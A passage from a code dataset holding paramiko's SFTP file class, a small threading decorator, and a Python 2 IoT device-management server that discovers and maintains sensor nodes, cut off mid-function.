source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
sftp_file.py
|
# Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
SFTP file object
"""
from __future__ import with_statement
from binascii import hexlify
from collections import deque
import socket
import threading
import time
from paramiko.common import DEBUG
from paramiko.file import BufferedFile
from paramiko.py3compat import long
from paramiko.sftp import CMD_CLOSE, CMD_READ, CMD_DATA, SFTPError, CMD_WRITE, \
CMD_STATUS, CMD_FSTAT, CMD_ATTRS, CMD_FSETSTAT, CMD_EXTENDED
from paramiko.sftp_attr import SFTPAttributes
class SFTPFile (BufferedFile):
"""
Proxy object for a file on the remote server, in client mode SFTP.
Instances of this class may be used as context managers in the same way
that built-in Python file objects are.
"""
# Some sftp servers will choke if you send read/write requests larger than
# this size.
MAX_REQUEST_SIZE = 32768
def __init__(self, sftp, handle, mode='r', bufsize=-1):
BufferedFile.__init__(self)
self.sftp = sftp
self.handle = handle
BufferedFile._set_mode(self, mode, bufsize)
self.pipelined = False
self._prefetching = False
self._prefetch_done = False
self._prefetch_data = {}
self._prefetch_extents = {}
self._prefetch_lock = threading.Lock()
self._saved_exception = None
self._reqs = deque()
def __del__(self):
self._close(async=True)
def close(self):
"""
Close the file.
"""
self._close(async=False)
def _close(self, async=False):
# We allow double-close without signaling an error, because real
# Python file objects do. However, we must protect against actually
# sending multiple CMD_CLOSE packets, because after we close our
# handle, the same handle may be re-allocated by the server, and we
# may end up mysteriously closing some random other file. (This is
# especially important because we unconditionally call close() from
# __del__.)
if self._closed:
return
self.sftp._log(DEBUG, 'close(%s)' % hexlify(self.handle))
if self.pipelined:
self.sftp._finish_responses(self)
BufferedFile.close(self)
try:
if async:
# GC'd file handle could be called from an arbitrary thread -- don't wait for a response
self.sftp._async_request(type(None), CMD_CLOSE, self.handle)
else:
self.sftp._request(CMD_CLOSE, self.handle)
except EOFError:
# may have outlived the Transport connection
pass
except (IOError, socket.error):
# may have outlived the Transport connection
pass
def _data_in_prefetch_requests(self, offset, size):
k = [x for x in list(self._prefetch_extents.values()) if x[0] <= offset]
if len(k) == 0:
return False
k.sort(key=lambda x: x[0])
buf_offset, buf_size = k[-1]
if buf_offset + buf_size <= offset:
# prefetch request ends before this one begins
return False
if buf_offset + buf_size >= offset + size:
# inclusive
return True
# well, we have part of the request. see if another chunk has the rest.
return self._data_in_prefetch_requests(buf_offset + buf_size, offset + size - buf_offset - buf_size)
def _data_in_prefetch_buffers(self, offset):
"""
if a block of data is present in the prefetch buffers, at the given
offset, return the offset of the relevant prefetch buffer. otherwise,
return None. this guarantees nothing about the number of bytes
collected in the prefetch buffer so far.
"""
k = [i for i in self._prefetch_data.keys() if i <= offset]
if len(k) == 0:
return None
index = max(k)
buf_offset = offset - index
if buf_offset >= len(self._prefetch_data[index]):
# it's not here
return None
return index
def _read_prefetch(self, size):
"""
read data out of the prefetch buffer, if possible. if the data isn't
in the buffer, return None. otherwise, behaves like a normal read.
"""
# while not closed, and haven't fetched past the current position, and haven't reached EOF...
while True:
offset = self._data_in_prefetch_buffers(self._realpos)
if offset is not None:
break
if self._prefetch_done or self._closed:
break
self.sftp._read_response()
self._check_exception()
if offset is None:
self._prefetching = False
return None
prefetch = self._prefetch_data[offset]
del self._prefetch_data[offset]
buf_offset = self._realpos - offset
if buf_offset > 0:
self._prefetch_data[offset] = prefetch[:buf_offset]
prefetch = prefetch[buf_offset:]
if size < len(prefetch):
self._prefetch_data[self._realpos + size] = prefetch[size:]
prefetch = prefetch[:size]
return prefetch
def _read(self, size):
size = min(size, self.MAX_REQUEST_SIZE)
if self._prefetching:
data = self._read_prefetch(size)
if data is not None:
return data
t, msg = self.sftp._request(CMD_READ, self.handle, long(self._realpos), int(size))
if t != CMD_DATA:
raise SFTPError('Expected data')
return msg.get_string()
def _write(self, data):
# may write less than requested if it would exceed max packet size
chunk = min(len(data), self.MAX_REQUEST_SIZE)
self._reqs.append(self.sftp._async_request(type(None), CMD_WRITE, self.handle, long(self._realpos), data[:chunk]))
if not self.pipelined or (len(self._reqs) > 100 and self.sftp.sock.recv_ready()):
while len(self._reqs):
req = self._reqs.popleft()
t, msg = self.sftp._read_response(req)
if t != CMD_STATUS:
raise SFTPError('Expected status')
# convert_status already called
return chunk
def settimeout(self, timeout):
"""
Set a timeout on read/write operations on the underlying socket or
ssh `.Channel`.
:param float timeout:
seconds to wait for a pending read/write operation before raising
``socket.timeout``, or ``None`` for no timeout
.. seealso:: `.Channel.settimeout`
"""
self.sftp.sock.settimeout(timeout)
def gettimeout(self):
"""
Returns the timeout in seconds (as a `float`) associated with the
socket or ssh `.Channel` used for this file.
.. seealso:: `.Channel.gettimeout`
"""
return self.sftp.sock.gettimeout()
def setblocking(self, blocking):
"""
Set blocking or non-blocking mode on the underiying socket or ssh
`.Channel`.
:param int blocking:
0 to set non-blocking mode; non-0 to set blocking mode.
.. seealso:: `.Channel.setblocking`
"""
self.sftp.sock.setblocking(blocking)
def seek(self, offset, whence=0):
self.flush()
if whence == self.SEEK_SET:
self._realpos = self._pos = offset
elif whence == self.SEEK_CUR:
self._pos += offset
self._realpos = self._pos
else:
self._realpos = self._pos = self._get_size() + offset
self._rbuffer = bytes()
def stat(self):
"""
Retrieve information about this file from the remote system. This is
exactly like `.SFTPClient.stat`, except that it operates on an
already-open file.
:return: an `.SFTPAttributes` object containing attributes about this file.
"""
t, msg = self.sftp._request(CMD_FSTAT, self.handle)
if t != CMD_ATTRS:
raise SFTPError('Expected attributes')
return SFTPAttributes._from_msg(msg)
def chmod(self, mode):
"""
Change the mode (permissions) of this file. The permissions are
unix-style and identical to those used by Python's `os.chmod`
function.
:param int mode: new permissions
"""
self.sftp._log(DEBUG, 'chmod(%s, %r)' % (hexlify(self.handle), mode))
attr = SFTPAttributes()
attr.st_mode = mode
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def chown(self, uid, gid):
"""
Change the owner (``uid``) and group (``gid``) of this file. As with
Python's `os.chown` function, you must pass both arguments, so if you
only want to change one, use `stat` first to retrieve the current
owner and group.
:param int uid: new owner's uid
:param int gid: new group id
"""
self.sftp._log(DEBUG, 'chown(%s, %r, %r)' % (hexlify(self.handle), uid, gid))
attr = SFTPAttributes()
attr.st_uid, attr.st_gid = uid, gid
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def utime(self, times):
"""
Set the access and modified times of this file. If
``times`` is ``None``, then the file's access and modified times are set
to the current time. Otherwise, ``times`` must be a 2-tuple of numbers,
of the form ``(atime, mtime)``, which is used to set the access and
modified times, respectively. This bizarre API is mimicked from Python
for the sake of consistency -- I apologize.
:param tuple times:
``None`` or a tuple of (access time, modified time) in standard
internet epoch time (seconds since 01 January 1970 GMT)
"""
if times is None:
times = (time.time(), time.time())
self.sftp._log(DEBUG, 'utime(%s, %r)' % (hexlify(self.handle), times))
attr = SFTPAttributes()
attr.st_atime, attr.st_mtime = times
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def truncate(self, size):
"""
Change the size of this file. This usually extends
or shrinks the size of the file, just like the ``truncate()`` method on
Python file objects.
:param size: the new size of the file
:type size: int or long
"""
self.sftp._log(DEBUG, 'truncate(%s, %r)' % (hexlify(self.handle), size))
attr = SFTPAttributes()
attr.st_size = size
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def check(self, hash_algorithm, offset=0, length=0, block_size=0):
"""
Ask the server for a hash of a section of this file. This can be used
to verify a successful upload or download, or for various rsync-like
operations.
The file is hashed from ``offset``, for ``length`` bytes. If ``length``
is 0, the remainder of the file is hashed. Thus, if both ``offset``
and ``length`` are zero, the entire file is hashed.
Normally, ``block_size`` will be 0 (the default), and this method will
return a byte string representing the requested hash (for example, a
string of length 16 for MD5, or 20 for SHA-1). If a non-zero
``block_size`` is given, each chunk of the file (from ``offset`` to
``offset + length``) of ``block_size`` bytes is computed as a separate
hash. The hash results are all concatenated and returned as a single
string.
For example, ``check('sha1', 0, 1024, 512)`` will return a string of
length 40. The first 20 bytes will be the SHA-1 of the first 512 bytes
of the file, and the last 20 bytes will be the SHA-1 of the next 512
bytes.
:param str hash_algorithm:
the name of the hash algorithm to use (normally ``"sha1"`` or
``"md5"``)
:param offset:
offset into the file to begin hashing (0 means to start from the
beginning)
:type offset: int or long
:param length:
number of bytes to hash (0 means continue to the end of the file)
:type length: int or long
:param int block_size:
number of bytes to hash per result (must not be less than 256; 0
means to compute only one hash of the entire segment)
:type block_size: int
:return:
`str` of bytes representing the hash of each block, concatenated
together
:raises IOError: if the server doesn't support the "check-file"
extension, or possibly doesn't support the hash algorithm
requested
.. note:: Many (most?) servers don't support this extension yet.
.. versionadded:: 1.4
"""
t, msg = self.sftp._request(CMD_EXTENDED, 'check-file', self.handle,
hash_algorithm, long(offset), long(length), block_size)
ext = msg.get_text()
alg = msg.get_text()
data = msg.get_remainder()
return data
def set_pipelined(self, pipelined=True):
"""
Turn on/off the pipelining of write operations to this file. When
pipelining is on, paramiko won't wait for the server response after
each write operation. Instead, they're collected as they come in. At
the first non-write operation (including `.close`), all remaining
server responses are collected. This means that if there was an error
with one of your later writes, an exception might be thrown from within
`.close` instead of `.write`.
By default, files are not pipelined.
:param bool pipelined:
``True`` if pipelining should be turned on for this file; ``False``
otherwise
.. versionadded:: 1.5
"""
self.pipelined = pipelined
def prefetch(self):
"""
Pre-fetch the remaining contents of this file in anticipation of future
`.read` calls. If reading the entire file, pre-fetching can
dramatically improve the download speed by avoiding roundtrip latency.
The file's contents are incrementally buffered in a background thread.
The prefetched data is stored in a buffer until read via the `.read`
method. Once data has been read, it's removed from the buffer. The
data may be read in a random order (using `.seek`); chunks of the
buffer that haven't been read will continue to be buffered.
.. versionadded:: 1.5.1
"""
size = self.stat().st_size
# queue up async reads for the rest of the file
chunks = []
n = self._realpos
while n < size:
chunk = min(self.MAX_REQUEST_SIZE, size - n)
chunks.append((n, chunk))
n += chunk
if len(chunks) > 0:
self._start_prefetch(chunks)
def readv(self, chunks):
"""
Read a set of blocks from the file by (offset, length). This is more
efficient than doing a series of `.seek` and `.read` calls, since the
prefetch machinery is used to retrieve all the requested blocks at
once.
:param chunks:
a list of (offset, length) tuples indicating which sections of the
file to read
:type chunks: list(tuple(long, int))
:return: a list of blocks read, in the same order as in ``chunks``
.. versionadded:: 1.5.4
"""
self.sftp._log(DEBUG, 'readv(%s, %r)' % (hexlify(self.handle), chunks))
read_chunks = []
for offset, size in chunks:
# don't fetch data that's already in the prefetch buffer
if self._data_in_prefetch_buffers(offset) or self._data_in_prefetch_requests(offset, size):
continue
# break up anything larger than the max read size
while size > 0:
chunk_size = min(size, self.MAX_REQUEST_SIZE)
read_chunks.append((offset, chunk_size))
offset += chunk_size
size -= chunk_size
self._start_prefetch(read_chunks)
# now we can just devolve to a bunch of read()s :)
for x in chunks:
self.seek(x[0])
yield self.read(x[1])
### internals...
def _get_size(self):
try:
return self.stat().st_size
except:
return 0
def _start_prefetch(self, chunks):
self._prefetching = True
self._prefetch_done = False
t = threading.Thread(target=self._prefetch_thread, args=(chunks,))
t.setDaemon(True)
t.start()
def _prefetch_thread(self, chunks):
# do these read requests in a temporary thread because there may be
# a lot of them, so it may block.
for offset, length in chunks:
with self._prefetch_lock:
num = self.sftp._async_request(self, CMD_READ, self.handle, long(offset), int(length))
self._prefetch_extents[num] = (offset, length)
def _async_response(self, t, msg, num):
if t == CMD_STATUS:
# save exception and re-raise it on next file operation
try:
self.sftp._convert_status(msg)
except Exception as e:
self._saved_exception = e
return
if t != CMD_DATA:
raise SFTPError('Expected data')
data = msg.get_string()
with self._prefetch_lock:
offset, length = self._prefetch_extents[num]
self._prefetch_data[offset] = data
del self._prefetch_extents[num]
if len(self._prefetch_extents) == 0:
self._prefetch_done = True
def _check_exception(self):
"""if there's a saved exception, raise & clear it"""
if self._saved_exception is not None:
x = self._saved_exception
self._saved_exception = None
raise x
|
decorators.py
|
from threading import Thread
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
|
deviceserver.py
|
#!/usr/bin/env python
#
# Copyright (c) 2015-2016, Yanzi Networks AB.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holders nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# Author: Joakim Eriksson, joakime@sics.se
# Niclas Finne, nfi@sics.se
#
# Grab devices using Sparrow Application Layer and keep them in the network
#
import tlvlib, nstatslib, sys, struct, binascii, socket, time, threading
import subprocess, re, dscli, logging
EVENT_DISCOVERY = "discovery"
EVENT_BUTTON = "button"
EVENT_MOTION = "motion"
EVENT_NSTATS_RPL = "nstats-rpl"
class EndPoint:
sock = None
host = None
port = None
def __init__(self, sock, host, port=tlvlib.UDP_PORT):
self.sock = sock
self.host = host
self.port = port
def sendto(self, data):
self.sock.sendto(data, (self.host, self.port))
def __str__(self):
return "EndPoint(" + `self.sock` + "," + `self.host` + "," + `self.port` + ")"
class Device:
endpoint = None
product_type = None
device_info = None
label = 'unknown'
boot_time = 0
address = ""
log = None
button_instance = None
button_counter = None
leds_instance = None
lamp_instance = None
temperature_instance = None
nstats_instance = None
sleep_instance = None
motion_instance = None
motion_counter = None
nstats_rpl = None
next_fetch = 0
fetch_tries = 0
next_update = 0
update_tries = 0
discovery_tries = 0
_discovery_lock = False
_outgoing = None
_outgoing_callbacks = None
_pending_outgoing = False
def __init__(self, device_address, device_endpoint, device_server):
self.endpoint = device_endpoint
self.address = device_address
self._device_server = device_server
self.last_seen = 0
self.last_ping = 0
self.log = logging.getLogger(device_address)
def is_discovered(self):
return self.product_type is not None
def is_sleepy_device(self):
return self._outgoing is not None
def set_sleepy_device(self):
if self._outgoing is None:
self._outgoing = []
def get_instance(self, instance_type):
if self.device_info:
i = 1
for data in self.device_info[1]:
if data[0] == instance_type:
return i
i += 1
return None
def has_pending_tlv(self, tlv):
if self._outgoing is None:
return False
if type(tlv) == list:
for t in tlv:
if self.has_pending_tlv(t):
return True
else:
for t in self._outgoing:
if t.instance == tlv.instance and t.variable == tlv.variable and t.op == tlv.op and t.element_size == tlv.element_size and t.length == tlv.length:
return True
return False
def send_tlv(self, tlv, callback = None):
if callback:
if self._outgoing_callbacks:
self._outgoing_callbacks.append(callback)
else:
self._outgoing_callbacks = [callback]
if self._outgoing is None:
return self._send_immediately(tlv)
if type(tlv) == list:
self._outgoing += tlv
else:
self._outgoing.append(tlv)
return True
def get_pending_packet_count(self):
if self._outgoing:
return len(self._outgoing)
return 0
def _flush(self):
if self._outgoing is not None and len(self._outgoing) > 0:
self.log.debug("FLUSH %s",tlvlib.get_tlv_short_info(self._outgoing))
tlvs = self._outgoing
self._outgoing = []
self._send_immediately(tlvs)
def _send_immediately(self, tlv):
self._pending_outgoing = True
data = tlvlib.create_encap(tlv)
self.endpoint.sendto(data)
return True
def _process_tlvs(self, tlvs):
self.last_seen = time.time();
for tlv in tlvs:
if tlv.error != 0:
# TLV errors has already been printed when received
if tlv.instance == 0:
if tlv.variable == tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG:
self.log.warning("Failed to update WDT - trying to grab!")
self._device_server.grab_device(self)
elif tlv.op & 0x7f == tlvlib.TLV_GET_RESPONSE:
self._process_get_response(tlv)
elif tlv.op & 0x7f == tlvlib.TLV_EVENT_RESPONSE:
self._process_get_response(tlv)
# TODO handle other types
if self._pending_outgoing:
self._pending_outgoing = False
if self._outgoing_callbacks:
callbacks = self._outgoing_callbacks
self._outgoing_callbacks = None
for callback in callbacks[:]:
try:
callback(self, tlvs)
except Exception as e:
self.log.error("*** TLV callback error: %s", str(e))
def _process_get_response(self, tlv):
if tlv.instance == 0:
if tlv.variable == tlvlib.VARIABLE_UNIT_BOOT_TIMER:
# Update the boot time estimation
seconds,ns = tlvlib.convert_ieee64_time(tlv.int_value)
last_boot_time = self.boot_time
self.boot_time = self.last_seen - seconds
# Assume reboot if the boot time backs at least 30 seconds
if last_boot_time - self.boot_time > 30:
self.log.info("REBOOT DETECTED!")
elif tlv.variable == tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG:
if self.next_update < 0:
# Ignore watchdog in this device
pass
elif hasattr(tlv, 'int_value') and tlv.int_value > 0:
self.log.debug("WDT updated! %d seconds remaining",
tlv.int_value)
self.next_update = self.last_seen + tlv.int_value - self._device_server.guard_time
self.update_tries = 0
else:
# Need to refresh watchdog
t1 = tlvlib.create_set_tlv32(0, tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG,
self._device_server.watchdog_time)
self.send_tlv(t1)
elif tlv.variable == tlvlib.VARIABLE_SLEEP_DEFAULT_AWAKE_TIME:
# This node is a sleepy node
self.set_sleepy_device()
elif self.button_instance and tlv.instance == self.button_instance:
if tlv.variable == tlvlib.VARIABLE_GPIO_TRIGGER_COUNTER:
self.button_counter = tlv.int_value
elif tlv.variable == tlvlib.VARIABLE_EVENT_ARRAY and tlv.op == tlvlib.TLV_EVENT_RESPONSE:
self.log.info("button pressed - %d times",self.button_counter)
# Rearm the button
self.arm_device(self.button_instance)
de = DeviceEvent(self, EVENT_BUTTON, self.button_counter)
self._device_server.send_event(de)
elif self.motion_instance and tlv.instance == self.motion_instance:
if tlv.variable == 0x100:
self.motion_counter, = struct.unpack("!q", tlv.data[8:16])
elif tlv.variable == tlvlib.VARIABLE_EVENT_ARRAY and tlv.op == tlvlib.TLV_EVENT_RESPONSE:
self.log.info("MOTION! - %d times",self.motion_counter)
# Rearm the button
self.arm_device(self.motion_instance)
de = DeviceEvent(self, EVENT_MOTION, self.motion_counter)
self._device_server.send_event(de)
elif self.nstats_instance and tlv.instance == self.nstats_instance:
if tlv.variable == tlvlib.VARIABLE_NSTATS_DATA:
self._handle_nstats(tlv)
elif self.temperature_instance and tlv.instance == self.temperature_instance:
if tlv.variable == tlvlib.VARIABLE_TEMPERATURE:
temperature = (tlv.int_value - 273150) / 1000.0
self.log.info("Temperature: " + str(round(temperature, 2)) + " C")
def _handle_nstats(self, tlv):
if tlv.error != 0:
return
nstats = nstatslib.Nstats(tlv.value)
if not nstats:
return
rpl = nstats.get_data_by_type(nstatslib.NSTATS_TYPE_RPL)
if not rpl:
return
self.nstats_rpl = rpl
de = DeviceEvent(self, EVENT_NSTATS_RPL, rpl)
self._device_server.send_event(de)
def arm_device(self, instances):
tlvs = [tlvlib.create_set_vector_tlv(0, tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 1,
struct.pack("!L", 1))]
if type(instances) == list:
for i in instances:
t = tlvlib.create_set_vector_tlv(i, tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 2,
struct.pack("!LL", 1, 2))
tlvs.append(t)
else:
t = tlvlib.create_set_vector_tlv(instances,
tlvlib.VARIABLE_EVENT_ARRAY, 0, 0, 2,
struct.pack("!LL", 1, 2))
tlvs.append(t)
if not self.send_tlv(tlvs):
log.warning("Failed to arm device!")
def info(self):
info = " " + self.address + "\t"
if self.is_discovered():
info += "0x%016x"%self.product_type
if self.is_sleepy_device():
info += "\t[sleepy]"
return info
def __str__(self):
return "Device(" + self.address + " , " + str(self.is_sleepy_device()) + ")"
# DeviceEvent used for different callbacks
class DeviceEvent:
def __init__(self, device = None, event_type = None, event_data = None):
self.device = device
self.event_type = event_type
self.event_data = event_data
def __str__(self):
addr = None
if self.device:
addr = self.device.address
return "DeviceEvent(" + `addr` + "," + `self.event_type` + "," + `self.event_data` + ")"
class DeviceServer:
_sock = None
_sock4 = None
running = True
device_server_host = None
router_host = "localhost"
router_address = None
router_prefix = None
router_instance = None
brm_instance = None
nstats_instance = None
radio_instance = None
radio_channel = 26
radio_panid = 0xabcd
udp_address = "aaaa::1"
udp_port = 4444
# The open range is 7000 - 7999
# This is what is announced in the beacon
location = 7000
# This is what is set when grabbing the node
grab_location = 0
# watchdog time in seconds
watchdog_time = 1200
guard_time = 300
# Try to grab any device it hears
grab_all = 0
_accept_nodes = None
fetch_time = 120
def __init__(self):
self._devices = {}
self._callbacks = []
self.log = logging.getLogger("server")
def send_event(self, device_event):
# print "Sending event:", device_event
for callback in self._callbacks[:]:
# print "Callback to:", callback
try:
callback(device_event)
except Exception as e:
self.error("*** callback error: %s", str(e))
def add_event_listener(self, callback):
self._callbacks.append(callback)
def remove_event_listener(self, callback):
self._callbacks.remove(callback)
# 24-bit reserved, 8-bit type = 02
# 16-bit reserved, 16-bit port
# 16-byte IPv6 address
# 4-byte location ID
# 4-byte reserved
def grab_device(self, target):
# Do not try to grab targets that should not be grabbed
if hasattr(target, 'next_update') and target.next_update < 0:
return False
IPv6Str = binascii.hexlify(socket.inet_pton(socket.AF_INET6, self.udp_address))
payloadStr = "000000020000%04x"%self.udp_port + IPv6Str + "%08x"%self.grab_location + "00000000"
payload = binascii.unhexlify(payloadStr)
self.log.info("[%s] Grabbing device => %s (%s)", target, payloadStr, str(len(payload)))
t1 = tlvlib.create_set_tlv(0, tlvlib.VARIABLE_UNIT_CONTROLLER_ADDRESS, 3,
payload)
t2 = tlvlib.create_set_tlv32(0, tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG,
self.watchdog_time)
if hasattr(target, 'send_tlv'):
if target.has_pending_tlv(t2):
self.log.info("[%s] Already has pending grab request", target.address)
return False
if not target.send_tlv([t1,t2]):
self.log.info("[%s] Failed to grab device (time out)", target.address)
return False
return True
try:
tlvlib.send_tlv([t1,t2], target)
return True
except socket.timeout:
self.log.warning("[%s] Failed to grab device (time out)", str(target))
return False
def set_location(self, address, location):
self.log.debug("[%s] Setting location to %d", address, location)
t = tlvlib.create_set_tlv32(0, tlvlib.VARIABLE_LOCATION_ID, location)
enc,tlvs = tlvlib.send_tlv(t, address)
return tlvs
def discover_device(self, dev):
if dev._discovery_lock:
return
dev._discovery_lock = True
dev.discovery_tries = dev.discovery_tries + 1
try:
dev.log.debug("trying to do TLV discover")
dev.device_info = tlvlib.discovery(dev.address)
dev.product_type = dev.device_info[0][1]
dev.label = dev.device_info[0][0]
print "\tFound: ", dev.device_info[0][0], " Product Type: 0x%016x"%dev.product_type
seconds,nanoseconds = tlvlib.convert_ieee64_time(dev.device_info[0][2])
dev.boot_time = time.time() - seconds
i = 1
for data in dev.device_info[1]:
if data[0] == tlvlib.INSTANCE_BUTTON_GENERIC:
dev.button_instance = i
elif data[0] == tlvlib.INSTANCE_MOTION_GENERIC:
dev.motion_instance = i
elif data[0] == tlvlib.INSTANCE_LEDS_GENERIC:
dev.leds_instance = i
elif data[0] == tlvlib.INSTANCE_LAMP:
dev.lamp_instance = i
elif data[0] == tlvlib.INSTANCE_TEMP_GENERIC:
dev.temperature_instance = i
elif data[0] == tlvlib.INSTANCE_TEMPHUM_GENERIC:
dev.temperature_instance = i
elif data[0] == tlvlib.INSTANCE_NETWORK_STATISTICS:
print "\tFound: Network Statistics"
dev.nstats_instance = i
elif data[0] == tlvlib.INSTANCE_SLEEP:
print "\tFound: Sleep instance"
dev.sleep_instance = i
dev.set_sleepy_device()
i += 1
if dev.next_update == 0:
if self.grab_device(dev):
dev.next_update = time.time() + self.watchdog_time - self.guard_time
if dev.button_instance:
print "\tFound: Button instance - arming device!"
dev.arm_device(dev.button_instance)
if dev.motion_instance:
print "\tFound: Motion instance - arming device!"
dev.arm_device(dev.motion_instance)
de = DeviceEvent(dev, EVENT_DISCOVERY)
self.send_event(de)
except Exception as e:
dev.log.error("discovery failed: %s", str(e))
dev._discovery_lock = False
def ping(self, dev):
dev.log.debug("Pinging to check liveness...")
p = subprocess.Popen(["ping6", "-c", "1", dev.address],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
while True:
line = p.stdout.readline()
if line == '': break
# print line
except Exception as e:
print e
dev.log.error("Ping Unexpected error: %s", str(sys.exc_info()[0]))
p.wait()
dev.last_ping = time.time()
if p.returncode == 0:
dev.last_seen = dev.last_ping
if p.returncode == None:
p.terminate()
# ----------------------------------------------------------------
# manage devices
# this will maintain the devices - keep the "grabbed" by updating the
# watchdog timer - Note: might need to keep a add/delete list to aovid
# messing with the same lists when devices need to be added/deleted.
# ----------------------------------------------------------------
def _manage_devices(self):
while self.running:
current_time = time.time()
remove_list = []
for dev in self.get_devices():
# Check if there is need for discovery
if not dev.is_discovered():
if dev.discovery_tries < 5:
self.discover_device(dev)
if not dev.is_discovered():
# Do a live check if needed...
if dev.last_seen + 60 < current_time and dev.last_ping + 60 < current_time:
self.ping(dev)
# Remove non-discoverable devices after some time
# so they can be tried again
if dev.last_seen + 180 < current_time:
print "Removing",dev.address,"last seen",(current_time - dev.last_seen),"seconds ago"
remove_list.append(dev)
continue
# Check if there is need for WDT update
if current_time > dev.next_update and dev.next_update >= 0:
dev.log.debug("UPDATING WDT!")
dev.update_tries += 1
if dev.update_tries > 20:
print "[" + dev.address + "] REMOVED due to",dev.update_tries,"WDT update retries"
remove_list.append(dev)
else:
t1 = tlvlib.create_set_tlv32(0, tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG, self.watchdog_time)
try:
# Retry every minute
dev.next_update = current_time + 60
dev.send_tlv(t1)
except Exception as e:
print "[" + dev.address + "] FAILED TO UPDATE WDT!"
print e
if current_time >= dev.next_fetch and dev.next_fetch >= 0:
dev.fetch_tries += 1
if self._fetch_periodic(dev):
dev.fetch_tries = 0
dev.next_fetch = time.time() + self.fetch_time
else:
print "*** failed to fetch from", dev.address,"("+str(dev.fetch_tries)+")"
# Try again a little later
dev.next_fetch = time.time() + 10 * dev.fetch_tries
for dev in remove_list:
self.remove_device(dev.address)
time.sleep(1)
def get_devices(self):
return list(self._devices.values())
def get_device(self, addr):
if addr in self._devices:
return self._devices[addr]
return None
# adds a device to the grabbed devices list
def _add_device(self, sock, addr, port=tlvlib.UDP_PORT):
d = self.get_device(addr)
if d is not None:
return d;
endpoint = EndPoint(sock, addr, port)
d = Device(addr, endpoint, self)
d.last_seen = time.time()
# to avoid pinging immediately
d.last_ping = d.last_seen
d.next_fetch = d.last_seen + self.fetch_time
d.log.debug("ADDED")
self._devices[addr] = d
return d
def add_device(self, addr, port=tlvlib.UDP_PORT):
self._add_device(self._sock, addr, port)
def remove_device(self, addr):
d = self.get_device(addr)
if d is not None:
del self._devices[addr]
d.log.debug("REMOVED")
def fetch_nstats(self):
t = threading.Thread(target=self._fetch_nstats)
t.daemon = True
t.start()
def _fetch_nstats(self):
for dev in self.get_devices():
if dev.nstats_instance:
# The device has the network instance
dev.log.debug("Requesting network statistics")
try:
t = nstatslib.create_nstats_tlv(dev.nstats_instance)
if not dev.send_tlv(t):
dev.log.debug("*** Failed to fetch network statistics")
except Exception as e:
dev.log.debug("**** Failed to fetch network statistics: %s", str(e))
time.sleep(0.5)
def _lookup_device_host(self, prefix, default_host):
try:
output = subprocess.check_output('ifconfig | grep inet6 | grep -v " fe80" | grep -v " ::1"', shell=True)
# Check prefix first
p = re.compile(" (" + prefix + "[a-fA-F0-9:]+)(/| prefixlen )")
m = p.search(output)
if m:
return m.group(1)
p = re.compile(" ([a-fA-F0-9:]+)(/| prefixlen )")
m = p.search(output)
if m:
return m.group(1)
else:
print "----------"
print "ERROR: Failed to lookup device host address:"
print output
print "----------"
except Exception as e:
print "----------"
print e
print "ERROR: Failed to lookup device host address:", sys.exc_info()[0]
print "----------"
return default_host
def is_device_acceptable(self, host, device_type = 0):
if self._accept_nodes is None:
return True
if host.endswith(self._accept_nodes):
return True
return False
def _fetch_periodic(self, device):
t = []
t.append(tlvlib.create_get_tlv64(0, tlvlib.VARIABLE_UNIT_BOOT_TIMER))
if False and device.nstats_instance is not None:
t.append(nstatslib.create_nstats_tlv(device.nstats_instance))
if device.button_instance is not None:
t.append(tlvlib.create_set_vector_tlv(0, tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 1,
struct.pack("!L", 1)))
t.append(tlvlib.create_set_vector_tlv(device.button_instance,
